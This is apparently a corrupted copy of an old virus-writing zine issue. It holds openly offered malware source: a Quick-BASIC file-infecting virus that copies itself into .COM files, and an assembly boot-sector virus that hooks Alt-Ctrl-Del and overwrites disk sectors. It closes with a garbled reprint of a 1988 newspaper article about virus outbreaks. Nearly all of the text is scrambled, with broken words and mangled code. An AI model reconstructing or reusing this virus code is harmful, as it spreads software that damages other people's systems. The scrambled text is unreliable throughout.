Protln(' vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv');
Protln('  <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
Protln(' vvv<76><76>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD>vvv<76>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>vvvv');
Protln('  <20>۱<EFBFBD> <20>۱ <20>۱ <20>۱ <20>۱ <20>۱<EFBFBD> <20><> ');
Protln(' vvv<76>۱ <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ ');
Protln('  <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ <20>۱ <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
Protln(' vvv<76>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ <20>۱ <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ ');
Protln('  <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ ');
Protln(' vvv<76>۱ <20>۱ <20>۱ <20>۱ <20><>۱ <20><> <20><>۱ ');
Protln('  <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD> ');
Protln(' vvv <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
Protln('  ');
Protln(' ');
REPEAT
LOOPVAR:=0;
U ;|L LOOPVAR=1;
end;yE w{aAl alogs neatoiopularimiviruses, destrtive andin} {he lonrus off, ine drogr. ;|
} {h are
eted/a viinfeut 3 1/213Kthe ail enabl } {he the date/timet of p (DUNE } ]
+7] AshBit, tVs by u AshWWWWWWWWWWWWW
Whoehe virlogsl you uvs by us be made,S, tATCH.
Tirus was orwas at (DUNE
mostl the pao any mup a this S (not rions nterm. In tTirustATCH.
by usDEBUG & EDLINrams
wNn d: VR.tAT
echoi= o
brrrrrrrrr(ct ff ts lana
ceet? ul Ash( is done imporrd t.inueahinghe youre ti in CXo
b)
and bc:\msomma Ash( Mayers
isk) standas. Yo )
ask)*
/w>irstAsh( ise
y. (maaitten in Tusk)"irs"|
| /in dt of i12 bDUNE
medlichted<1 Ash( "Irs"|isspures nth this EDLINrso ine dis noin d
wx 2 fo)
aebughted<2 Ash( New bit, tam is ill (cst frh this aebug)medlichin d.bit<3Ash( is dobit, tgo .COM ve tsble file oou sse of the wEDLIN ceet?c (inueahing f. sfs betweagaiwmblyed hen
in dttttttttttttttt( Newnsidst frh CHAN.tATll (c the w
e laddiby-pat in nofeconrusBit, tn n,tis mond from y but is mo NUMBE10FF,
Hs more the isCOM nd from y bu:--------------------------------wNn d: 1
1,4dttttttttttttttt( Hs mocode,1-4he progr"IND"sfor rdte)
e"infd )
dtttttttttttttttttt( Sor fuor r)
Hs more the ds. Th nd from y bu:---------------------------------wNn d: 2
m100,10b,f ;(Fplace)m is ilin dtae thv the mass F Hess in me iso"ve)E
me108 ".tAT ;| (Exally,sk) fdis noin dll (cd.
COM itAT)
m100,10b,f 1 ;(Fp not
w for fagaiw)me100"DEL ;| ((DEL nd from itten in TuOM vs in me100H)
mf ,f b,104 ;| ((Oally na is not
wen in Tu the setis nd from)me10c 2dtttttttttttt(Ps be|issp
DRIa prethe sof tsn T of )me11 0d,0attttttttt( is igurned in+ocode,fehen
mf 1 ,f 20,11brrrrr(fy thii viis ntae thv the m11FHess in methe sr)
fonea)me112TA" PY \VR.tAT" (in PY nd from ittopiep
DRIa prethe your is n)me12b od,0attttttttt( PY nd from nated) str this cis iagurned in +ocb)
rxc ( ise
CXster settittt in)
2c ( f noe m2CH)
nin d.bit ( Nn dllt CHAN.tAT)
w ( Protn)
q ( qult ****ise
etirh nd from y bu be writtarins
rd dex dddrese of thitrnts aiws
2 ol. I (cd.racsets (1Ah=Cl. I (Z)the attt
wi immunlly,rnfe arinsfile.
Hsx dddree progretirh nd from y bu:------------------------------------wNn d: ,
0 31m2C 31m3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 1 , 1 ? . . y y y y y y y
0 1 79 29 0DUP (2C 32m3F 52-20 1A OD 6E 6E 79 79 79 y . 2 , ? ? r . . n y y y
0 2 79 79 79 79 29 0DU45 0D- y y y y . E . . . . . . . . . w
e l tablehis may c was oe m(SATAVR.tATld only bthe curredirearis dogm
ine dt INT s files are
. ]
+8] AsVs by u,S, tasic As----------------w
tasicwi iest f langund
ee n Tue to deaof it
this rd limiv
langund
astinht attembthe wext f the tdst fime
stan more them!as. Modifwell,ye in b
st littenoIt iLeat hakthe f okddres tasics Standdst frh by R. Buinfecte 1987.
is dogm
etweanwritten deiruses -
eby u,(Scan ) S (not fect or dafile
are
.Tthis will
odifyuOM nd p nofurce code, whig
pe ourcMicrose n
Quick-BASIC.Noe selecl ofhthe ptde so p ndthe attmocodkndtfiles to nd ondib
furce code, whigfec for jelecl ofhthe ptde objr dagm
et curreLENGHTVIR
var at a. BV3filesd only bthe current dir.
y. (ma,AND.COM filebe writ
able to a,curreLENGHTVIR var at a be writtf noe melecl ofhthe ptde codkndtttttt
am and (chanrer, we oe mf th/h)
nd eays o
en so p . w
1 REM **sDEMOtt
2 REM **sIES EYILL YOUR OWN WAYMIFiDESIN LA**
3 REM **sBASIC NOT NT SUCK
4 REM **sNO KIDDING
50HAT "PROGGOTO 670
6 REM ***eLENGHTVIR MUS; SETA**
7 REM ***eE READELENGHTeE READE**
8 REM ***eLINKOGRAMMING ***
90eLENGHTVIR=2641
VIRdir.$="BV3file"
11 REM ***e GARBAISK. HR YMINAISK.INTEN"INH"
13 SHELL DB*file>INH"
14 REM **sOPENN"INH".INTENMPROONLY THE E**
150HAPENN"R",1,"INH",32
16 GETA#1,1
7 THEMINPUT#1,ORIGINAL$
18 THEMINPUT#1,ORIGINAL$
19 THEMINPUT#1,ORIGINAL$
2 THEMINPUT#1,ORIGINAL$tt
210HAT "PROGGOT 670
22 CLOSE#2
23 F=1: THEMINPUT#1,ORIGINAL$
24 REM **s"%"OR EISK.MARKE, aFEISK.BV3
25 REM **s"%"ORNAISK. THE MEANS
26 REM **sT, IT OGR PY NT DESCR
27 IFiMID$(ORIGINAL$,1,1)="%"OBEGINGOTO 210
28 ORIGINAL$=MID$(ORIGINAL$,1,13)
29 EXTEN OF T$=MID$(ORIGINAL,9,13)
3 MID$(EXTEN OF T$,1,1)="."
31 REM ***eCONCATENN TH THE EINTO INTE THE E**
32 F=F+1
33 IFiMID$(ORIGINAL$,F,1)=" ROGMID$ (ORIGINAL$,F,1)=". ROGF=13OBEGINttttt
GOTO 350
34 GOTO 320
35 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTEN OF $
360HAT "PROGGOTO 210
365 TES.$=""
37 REM ++HAPENNINTENFOUPRO+++
380HAPENN"R",2,OROGINAL$,LENGHTVIR
39 IFiLOF(2) <eLENGHTVIR BEGINGOTO 420
40 GETA#2,2
41 THEMINPUT#1,TES.$
42 CLOSE#2
431mREM ++H_IF_I IFiAMMING R E + +--
44 REM ++H"%"OE COMMEE ILLEGISK.INTENMEANS..
45 REM ++HIS FOR EALONLYY SICK ++
46 REM IFiMID$(TES.,2,1)="%"OBEGINGOTO 210
47 CLOSE#1
48 ORIGINALT$=ORIGINAL$
490iMID$(ORIGINALS$,1,1)="%"
499 REM ++++HSAHEM"HEALTHY"iAMMING ++++
51 C$=" PY "+ORIGINAL$+" "+ORIGINALS$
52 SHELL C$
53 REM ***eCOPY FOR TO HEALTHYRAMMING ****
54 C$=" PY "+VIRdir.$+ORIGINAL$
55 SHELL C$
56 REM ***eAPPE IL FOR MARKE, ***
570HAPENNORIGINAL$tNY ACPPE ILASA#1eLEN=13
58 GARB#1,ORIGINALS$
59 CLOSE#1
63 REM ++HAUYPUTNMESSN
; ++
64 PR1 "T, IT F
; RNA" ;ORIGIANAL$; !! WOR T!!"
65 SYSTEM
66 REM **L FOR "PROGMESSN
;
670 PR1 " FOR IATIONAL "PROGGOTTCHAT!!!!":SYSTEM
68 E I
tttt
is dobisicsvwill not aine dt yourfiles to .er savintde ning Inonwish.
ll
any aN"INH". to rwas ants aiwsdate/t y. (ma,Ahe attmo to %SORTfile.
am
orwas a of ththis "%"Odte)NDORted/a viw,tisy to sten ryourupes itse2.5]
;=9]
;----------------------------------------------------------------------- Tirus was oishe progr"FLOPPY
| " var etp (DUNE Iunnstions .COM rogrbirecrs on he we floppy will astin
en is gaiwsdol. I ( il enabmntsff to (writupperry on Aentiunnst y. sdate/key, sor f. sd Pr (1 09H)writfor threeALT-CTRL-DEL sequencethe
rwas astamp l also ct to infect or daext floppy itin ngu,S, at thA: ( Iunkeepsdate/st lrbirecrs on he stryour39,crs on h8e itad IunNOT cttemmas by inrs on hbadhe currefe s(unthem!
Pakiard i Braiw)m; astid only you uoneafbeouor Iyonetn n,!
was ooooooooooooooooooooo also dieentiunchangets aiwsdnM veticted asnonwmecd.
ismyoas NOT c
o BRARNA. Modiftiuncp
nentlyeby u,itad ,crs on h8 astittemitad 1oooooo rs on h9ese of thttt
wi ind f-pat iOM ffloppy fion bn rois leooooo rto thastidout a rto tiftiunNOT cttemets aiwmanneralevolir.
TROJAINttt; HANY I whiiftiunNOT cx 2 foat iets aiwma er f.he wuckymext ffrom
itooo pproted/a viw standwill wayroxy alogs neatoiopul. le "ndn code so f.h to
he vs (rea tifttttttttttttttttttttttttttttttttttttttttttttttttttt DOCTOOOOOOOOOOOOOOOO Tirill t inhe f the parrus was : Iunave ne drilyelie exely deeanwALT-CTRL-DEL rebirecnd from it isarrus toestrarim an(ine diis mae smct tr)m heshe pnsting sby-pat i stands floppy will wayr. other ne do storeremntsff ethe sachted/a viem is de toOM r in ode ma aboe o
brchanrebirecachunted/a vies ithe hDOS. Iun tothe aress. Ain
en nM floppy isrbirer Iy isBASIC isr soundtttttt f isad. othenin
en ALT-CTRL-DEL dogms nth the sired f me BASIC,ttttt tvation e"ndn cted/a ve the iloppy fhe srwas asheswas.
i ooooooooooo ct to ihat worbireiftttttttttttttttttttttttttttttttttttttttttttttttttt DOCTOOOOOOOOOOOOOOOO chefnhe fiae sse of the w
P S nd from no s (wdol. I (toOOOOOOO estrto (wiwmupperry on As virus was oNOT ctteme m(SATA-pa8028 ma aboes (se of thttt
wi ittemp valida8028 f ion.
)iftttttttttttt DOCTOOOOOOOOOOOOOOOO Ir virus (wrmt arinht attem a vir
P S nd from no ning In,!nstiace
P S nd from a brein dn codens (wrmt a eginodensaebugh the i pf the progrted non c for jP S iwm for je
vN dl you uon by-p.OOOO Tie)NorarksUt of tsele founduor Ifectfy this ted disks. T wayroby for pet rogrbirecrs on hdn code not SYS ut of the founduor Ifec remntsff e(unthem!
Pakiard i Braiw)iftttttttttttttttttttttttttttttt;
;----------------------------------------------------------------------- tttttttttttttttttttttttt;
ttttORG 7C Hetttttttttttttt;
tttttttttttttttttttttttt;
Tot LABELtttttWOR ;|;T LEGSTACK
;----------------------------------------------------------------------- ; 1.pfirsttoree py on ATanies ithef and yus byeret dkeepime
sa the
ff n) ; 2. Sor faes ithe httmo tlace32 f. sd Pr ve on thOM roree py on ATtoo 3. Rst y. f.h9e(key, sor)writef and ye cuoree py on ATttttttttttttt;
; 4. Ju the cef and yet roree py on ATtttttttttttttttttttttttttttttttttt;
; 5. Lour nd one this REALrbirecrs on hthe juryour40,,itad ,crs on h8 t;
;----------------------------------------------------------------------- TO W: CLIttttttttttttttttt;INITIALIZEGSTACK
ttttX |
A ;| ;
ttttH,3B S ;|
;
ttttH,3B SP,-fff noTot ;|
;
ttttSTIttttttttttttttttt; tttttttttttttttttttttttt;
ttttH,3B 01 4 Hetttttt;ES = T LEGY" THI - (7C H+512)
ttttH,3B DS ;|
;
ttttH,3B A [0013H ;|
;
ttttHUL ;
ttttSUBB A 07E Hetttttt;ttt(7C H+512)/16
ttttH,3B E ;|
;
tttttttttttttttttttttttt;
ttttCX |
| ttt;DS = CS
ttttC D |
| ttt;
tttttttttttttttttttttttt;
ttttX,90 DI,3456Hetttttt;IEGISK. FOR IS REBOOT;
; . POPJNE _1 ;ttttt;
ttttX WoiruPtr TER],AX _ ;| (; . LOW&HI:ER],AX _ --
tttttttttttttttttttttttt;
_1 : H,3B SI,SPttttt;SP=7C tt; PY SELFeE RE LEGY" THI
ttttH,3B DI,SIttttttttttttttt;
ttttH,3B CX,512tttttttttttttt;
ttttC ;| itttt;
ttttREPttH,3S ;| ;
tttttttttttttttttttttttt;
ttttH,3B SI, ;CX=0tttttttttt;SHUN _SUBDe32 1 VE |ADDRESS INFE
ttttH,3B DI,-fff no TO WR- 128tttt;ttt128tBYT INBELOW OUR HI
; IMttttH,3B 111128tttttttttttttt;
ttttREPttH,3S ;| ;
tttttttttttttttttttttttt;
ttttUSE_OPUT_NEW_0 ;SHUN/RE HR 1 9e(KEYBOARD)
tttttttttttttttttttttttt;
ttttCX ;ES=HItttt;tttJU,90E ROUR HI
; I THIS
ttttC CS
tttttttttttttttttttttttt;
ttttCX D ;DS=0ttttt;tttES = DS
ttttC E |
| ttt;
tttttttttttttttttttttttt;
ttttH,3B 01 SPtttttttttt; B SP=7C tt;LOAD REALrBOOT R |E R :7C
ttttH,3B D ;CX=0tttttttt; DB 0 A: HEAD
ttttH,3B 7 ; B TRACKr40,,R |8
ttttH,3B A 0201 ; B ONLY R
; 1 13H ;ttt(nd f-pat i8/9crs o. 1/2 rto t!)
ttttJ $ ;ttt_DIS IFi "PRO
tttttttttttttttttttttttt;
ttttHECKtHEC_BOOT tttttt;HECK :7C
tttttttttttttttttttttttt;
;----------------------------------------------------------------------- ; SHUN BEGINRE HR 1 9eV |
| AT NTRY: DS = 0 ES = WHERTHE RSHUN ATH 0 & (HI ;| (oooooooooooooooooooooo WHERTHNEW_0 I |
|(HI ;| (ooooooooooooooooooooo;
;----------------------------------------------------------------------- PUT_NEW_0 :oooooooooooooooooo;
ooooX WoiruPtr T0413H ;T LEGY" THI ( 4 :0013) -= 1024
tttttttttttttttttttttttt;
ttttH,3B SI,9*4tttttttttttttt; PY 1 9eV |FE
ttttH,3B DI,-fff noATH 0 ;tttATH 0 ( WROUR HI
; I!)
ttttH,3B 0000014ttttttttttttt;
tttttttttttttttttttttttt;
ttttCLIttttttttttttttttt;
ttttREPttH,3S ;| ;
ttttH,3B WoiruPtr T9*4],-fff noNEW_0
ttttH,3B [(9*4)+2] ;
ttttSTIttttttttttttttttt; tttttttttttttttttttttttt;
tttt ; tttttttttttttttttttttttt;
;----------------------------------------------------------------------- AMESSETAKEYBOARD, COM,CKNOWLEDGE LABDeCHA |
| ;
;----------------------------------------------------------------------- LASHKEYBD:oooooooooooooooooo ; ttttIINttAL,61H o ;ESSETAKEYBOARD BEGIN DW INUIMttttH,3B AH ;| ; tttt |
AL,8 Hettttttttttttt; tttt U 61H ;|; ttttXCHG AL,AH ;|t; tttt U 61H ;|; ttttHECKtRBOOT tttttt ;|; tttttttttttttttttttttttt;
;----------------------------------------------------------------------- ; DATAFOR A WHICH I NDORUS LATERVIRUS.NS OF ttttttttttttttttttttttttttt;
; ONLSF tUNKNOW tttttttttttttttttttttttttttttttttttttttttttttttttttttttt;
;----------------------------------------------------------------------- TABLDB 0FF,0 27H,0,1 ;FORMA 1 FORMA OR THE CORACKr3
ttttF,0 27H,0,2 ; tt( URR NTLY NDORUS L)
ttttF,0 27H,0,3 ;
ttttF,0 27H,0,4 ;
ttttF,0 27H,0,5 ;
ttttF,0 27H,0,6 ;
ttttF,0 27H,0,7 ;
ttttF,0 27H,0,8 ;
tttttttttttttttttttttttt;
;A7C9AtttLABELtttttBYT ttttttttttt;
tttt0000 24Hettttttttttttt;NDORUS L
ttttF,0 0AD ;
ttttF,0 07C ;
ttttF,0 0A3 ;
ttttF000 26Hettttttttttttt; tttttttttttttttttttttttt;
;L7CA1:oooooooooooooooooo tt; ttttC C ;NDORUS L
ttttC DIttttttttttttt; ttttC SIttttttttttttt; ttttC E |
| ttt;
ttttC D |
| ttt;
ttttC ;;
ttttC ;|
ttttHECKtB
:B
;|
tttttttttttttttttttttttt;
;----------------------------------------------------------------------- ; IFiALT & CTRL & DEL BEGINt innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn ; IFiALT & CTRL & ? BEGINt innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnntt;
;----------------------------------------------------------------------- NEW_0 :ooCX ;|
nntt;
nnttSTIttttttttttttttttt; tttttttttttttttttttttttt;
ttttCX ;;
ttttCX ;
ttttDS ; tttttttttttttttttttttttt;
ttttCX |
| ttt;DS=CS
ttttC D |
| ttt;
tttttttttttttttttttttttt;
ttttH,3B 01 [ALT_CTRL ;| ;BX=SCAN ; I LABDeTIMIMttttIINttAL,6 Hettttttttttttt;GETASCAN ; I
ttttH,3B AH ;| ;SHUN IINAS
ttttMPRO A 887 ;STRIP 8th BIT IINAL,AKEEP 8th BIT AS
tttttttttttttttttttttttt;
ttttX,90 DHettttttttttttt;R E T A [CTRL] . POPJNE N09_1 ;tttttttt; . JU,90IFiNE
ttttH,3B BL,AH ;|t;(BL=08 AT KEY DOW , BL=88 AT KEY UP) ttttHECKtN09_3 ;tttttttt;
tttttttttttttttttttttttt;
N09_1 :ttX,90 3 ;|;R E T AN [ALT] . POPJNE N09_2 ;|; . JU,90IFiNE
ttttH,3B BH,AH ;|t;(BH=08 AT KEY DOW , BH=88 AT KEY UP) ttttHECKtN09_3 ;tttttttt;
tttttttttttttttttttttttt;
N09_2 :ttX,90 01 8 ;IFi(CTRL DOW & ALT DOW ) . POPJNE N09_3 ;tttttttt; . JU,90IFiNE
tttttttttttttttttttttttt;
ttttX,90 7 ;|;RF [I] . POPJ tttN09_X0 ;|; . JU,90IFiYES
ttttX,90 53 ;|;RF [DEL] . POPJ tttLASHKEYBD ;|; . JU,90IFiYES
tttttttttttttttttttttttt;
N09_3 :ttH,3B [ALT_CTRL] ;SHUN SCAN ; I HE CFILEeTIMIMtttttttttttttttttttttttt;
N09_9 :ttC D |
| ttt;
ttttC ;
ttttD ;;
ttttC ;|
tttttttttttttttttttttttt;
ttttF,0 0EAH ;HECKF :E987
ATH 0 F000 ? tttttt;
ttttF000 F He tttttt;
tttttttttttttttttttttttt;
N09_X :ttHECKtN09_X1 Ashtttttt;
tttttttttttttttttttttttt;
;----------------------------------------------------------------------- -----------------------------------------------------------------------;
RBOOT:tttH,3B D 03D ;DISABLDBCOLE CVIDEO !?!?
ttttH,3B A1 8 Hetttttt;AL=0, AS=DELAYFORG
tttt U D ;| ; ttttUSE_ODELAYF ;| ; ttttH,3B [ALT_CTRL] ;AX=0ttttt tttttttttttttttttttttttt;
ttttH,3B A 3 ;AH=0tttttttttt;SEL 80x25BCOLE
tttt1 1 He tttt;
ttttH,3B AH ttttt;SEDeCURSE CPOS X |
DX, ;
ttttH,3B 0H,DHettttttttttttt ; ttPN
; 0
tttt1 1 He tttt;
tttttttttttttttttttttttt;
ttttH,3B AH 1 Ashttt;SEDeCURSE CTYPIMttttH,3B 1110607 ;
tttt1 1 He tttt;
tttttttttttttttttttttttt;
ttttH,3B A11042 Hetttttt;DELAYF(AL=2 HeDUCATOINBELOW) ttttUSE_ODELAYF ;| ; tttttttttttttttttttttttt; ttttULIttttttttttttttttt;
tttt U 2 H ;|;SE ILTOINTOt1 DW ROLLEO
tttttttttttttttttttttttt;
ttttM,3B E ;CX=0t(DELAY) ;ESSTORN _SUBDe32 1 VE S
ttttM,3B DI ;|
; tt(REM,3INGROUR 1 09t_DIDLEO!)
ttttH,3B SI,-fff no TO WR- 128tttt;MttttH,3B 111128tttttttttttttt;
ttttC ;| itttt;
ttttREPttH,3S ;| ;
tttttttttttttttttttttttt;
ttttH,3B DS, ;CX=0tttttttttt;DS=0
tttttttttttttttttttttttt;
ttttH,3B WoiruPtr T19H*4],-fff noNEW_19t;SEDe1 19eV ttttH,3B [(19H*4)+2] |;
tttttttttttttttttttttttt;
ttttH,3B A1 4 Hetttttt;DS = ROM DATAFOR A
ttttH,3B DS, ;|
;
tttttttttttttttttttttttt;
ttttH,3B [00 7 ],AH ;AH=0ttttt;KBFLAG (SHIFTGSTATES) = 0
tttt1 WoiruPtr T0013H ;Y" THI SIZEG+= 1024 (WERTHNDORITYS|E)
tttttttttttttttttttttttt;
ttttCX D |
| ttt;IFiBIOS F :E502 == 21E4 . POPH,3B A1 F He ;
ttttH,3B DS, ;|
;
ttttX,90 WoiruPtr T0E502 ],21E4Htt;
ttttC D |
| ttt;
ttttJ tttR_ ;;
tttt1 19He tttt; 0IFiNET . REBOOT
tttttttttttttttttttttttt;
R_9 :ttttHECKt F :0E502 tttttttt; . DOE T ?!?!?!
tttttttttttttttttttttttt;
-----------------------------------------------------------------------;
; REBOOT 1 VE ttttttttttttttttttttttttttttttttttttttttttttttttttttt;
-----------------------------------------------------------------------;
NEW_19:ttX |
A ;| ;
tttttttttttttttttttttttt;
ttttH,3B DS, ;|
;DS=0
ttttH,3B A1 T0410 ;| (saAX=EQUIP FLAG
ttttTES. ;IFiFLOPPY DB 0S . POPJNZKtN19_2 ;|; . JU,9
N19_1 :ttCX |
| ttt;ELSE E =CS
ttttC E |
| ttt;
ttttUSE_OPUT_NEW_0 ;SHUN/RE HR 1 9e(KEYBOARD)
tttt1 1 ;LOAD BASIC
tttttttttttttttttttttttt;
N19_2 :ttH,3B 1110014ttttttttttttt;RETHI ER],A = 4
tttttttttttttttttttttttt;
N19_22:ttCX ;;
ttttH,3B AH ;| ;ESSETA
tttt1 13 ;;
ttttJ N19_81 Ashtttttt;
ttttH,3B A1 2 ;;ONLY BOOT R
ttttCX D |
| ttt;
ttttC E |
| ttt;
ttttM,3B 01 -fff no TO WR |
| ttt;
ttttM,3B 1111 |
| ttt;ORACKr0,,R |1
tttt1 13He tttt;
N19_81:ttC C ; POPJNB N19_ ;|
; POPLOOPtN19_2 ttttt ; POPJECKtN19_1 ;tttttttt;IFiRETHI EXPIN L . LOAD BASIC
tttttttttttttttttttttttt;
-----------------------------------------------------------------------;
; Reted diy-pasegm * innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnntttttttt;
-----------------------------------------------------------------------;
N19_ :ttX,90 DI,3456nnnnntttttttt;IFiNET FLAG SET . POPJNZKtRE_T, IT tttttt; . REsT, IT
tttttttttttttttttttttttt;
HEC_BOOT:tttttttttttttttttttt;PASS DW ROLNTOtBOOT R
ttttHECKt :7C He tt;
tttttttttttttttttttttttt;
-----------------------------------------------------------------------;
; Reted diy-paSegm * innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnntttttttt;
-----------------------------------------------------------------------;
RE_T, IT :ttttttttttttttttttt;
ttttM,3B SI,-fff no TO WRttttttttt;COMPOR TBOOT R |JUS; LOADED THIS
ttttH,3B 11100E6Hetttttt; tt URSELF
ttttH,3B DI,SIttttttttttttttt;
ttttCX |
| ttt;
ttttC E |
| ttt;
ttttC ;| itttt;
ttttREPEtX,9S ;| ;
ttttJ tttRI_12ttttttttttttttt;IFiNET EQUAL . POPPPPPPPPPPPPPPPPPPPPP;
tttt1 WoiruPtr ENTA],],AX _ ;;1 . ER WROUR ; I (NET DS!)
tttttttttttttttttttttttt;
;MAKE SURTHERACKr3 , HEAD FORMA OGRt;
ttttM,3B 01 -fff noTABLDB 0Ftttttt;FORMA 1 FO
ttttH,3B D110010ttttttttttttt; DB 0 A: HEAD
ttttH,3B H,40- ;;ORACKr3
ttttH,3B AH 5 ;;FORMA
ttttHECKtRI_10 ;REM,3BAISK.FORMA OP OR THE CNOW !
tttttttttttttttttttttttt;
<<<sNO EXECU OR TDB 32TO HERTH>>>tttt;
ttttJ RI_80ttttttttttttttt;
;
GARBAREALrBOOT R |E CORACKr3 , R |8, HEAD
RI_10:tttM,3B E ;ENTBX = 0 :7C , HEAD=0
ttttH,3B 01 -fff no TO WR |
| ttt;TRACKr40S
ttttH,3B 1L,8ttttttttttt;R |8
ttttH,3B A 0301 ; GARBA1 R
; 1 13H ; POPPPPPPPPPPPPPPPPPPPPP;
ttttCX |
| ttt; | (E =CSTHE CPUT_NEW_0 BELOW) ttttC E |
| ttt;
ttttJ RI_80ttttttttttttttt;IFi GARBA "PRO . JU,90TOtBOOT ; I
tttttttttttttttttttttttt;
ttttM,3B 111 ;; GARBAT, IT OGRBOOT R |!
ttttH,3B A 0301ttttttttttttt;
tttt1 13H ; POPJ RI_80ttttttttttttttt; IFi "PRO . JU,90TOtBOOT ; I
tttttttttttttttttttttttt;
RI_12:tttM,3B DI,3456Hetttttt;SETA"JUS; T, IT OGRANETHE, and" . POP1 19He tttt; . FLAG MPROONBOOT
tttttttttttttttttttttttt;
RI_80:tttUSE_OPUT_NEW_0 ;SHUN/RE HR 1 9e(KEYBOARD)
ttttX WoiruPtr ENTA],],AX _ ;; ((DE . EANLY|DIDN; T, IT ) ttttHECKtHEC_BOOT tttttt;
;
----------------------------------------------------------------------- -----------------------------------------------------------------------;
N09_X1:ttH,3B [ALT_CTRL] ;SHUN ALT & CTRL STATUS
tttttttttttttttttttttttt;
ttttH,3B A1 TER],AX _ ;| (t;PUT ER],AX _ INTO ESSETAFLAG
ttttH,3B 01 4 Hetttttt;
ttttH,3B DS ;|
;
ttttH,3B [0072 ], 4 :0072 = RSSETAFLAG
ttttHECKtN09_ ;|
; POPPPPPPPPPPPPPPPPPPPPP -----------------------------------------------------------------------;
;ODELAYF ;| AT NTRY AH:CX = LOOPtER],A -----------------------------------------------------------------------;
DELAY:tttSUBB CX ;|
;
D_01:ooooLOOPt$ ; POPSUBB AH 1 Ashttt;
ttttHNZKtD_01 Ashttt;
tttt ; tttttttttttttttttttttttt;
;----------------------------------------------------------------------- AMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM;
;----------------------------------------------------------------------- A7DF4tttttttttF,0 27H,00H,8
ER],AX _ ttttF000 1CH
ALT_CTRL ttttF000 A7DFCtttttttttF,0 27H,0,8
]
+10] AsVs ilihe lTie)Newu As------------------ Ty inrs oy-padealsia breiflard
mr f.he wstut dobisic lit,he bunch ofuvs by usastidtut you utermereache currenewupapets astimagazboes cuz OM fe httmodamae dateyutermedone. Enjoyiiii
Tyere's As Stande lMy Softwn b
Mischief-mup rspet rogrso puter dte)
e"ibons nfe end.
(it
tdnly AshihtoPhilip J. Hilts WasirilarksPost Stat Protr Tie)WasirilarksPost Weekfe Ediby-p, Pae d#38innMaye23-2 , 1988. Tinyrams
you uone)
e"ibons nfe of thmischiefuone)epidemic mrng
so puters asti of it
tnervousne "ndmrng yoo stwhe .Cni is maIn t Sinr jele
tlacetestshe progrnooy-pate 1983 mae smc aboes e focit, tastidp inf
"t oou aoy-padiseay u," rogrso puterm(SAld ppro inche code po f.he
rwas aas
mext a atttrty f iancethe p"so putermvs by"utermereachreporredhe currepast
year,dt INT hat wenshe proousangu,e pU.S. so puters alone. Sus avs by ustermereacheahis.et rogrNaoy-pal Aer-pautics astiSpace
Administns or , natirnaoy-pal Bf ite "nMc aboes Corpors or , rogrHof the
Rent * a andy REt leayt sixhuntversf tse,crsver har
jorrso putermnet. If
sus aas Comp-u-serv non crsver habf ite "se,cded wihat wi d(SAld's lard
st
so puter-servicgrso pext, rogr$4.4 billy-paEd par-pic Dnly,Ss. Yo
Corpors or he hDOM as,OTexas. Wn in Tubneraliciof rams
mers,!
was e
esneakedhe t iet puter as. Yo bnepiggybackhat wi mA-palegf tm
inrams
astime "Pror. othere,
ateyuhangbrepasor Ialongtoth f ion.
r Ifecwaithuntileularearr.
Cmoof yoto
bulaceoout tastid
stroytdnly. Hhisregu,e pso puters at rogrHebrew Untversf the hJeas ale (chan stan
for u,S, Israel, h ehif laaceoOM fyonet was oNeyed heIfecdp inf dn coden,
inoo
HOswiper nnetFrida drogrtttrteacd , d
stroytOM fdnly,iwmanneso putermit
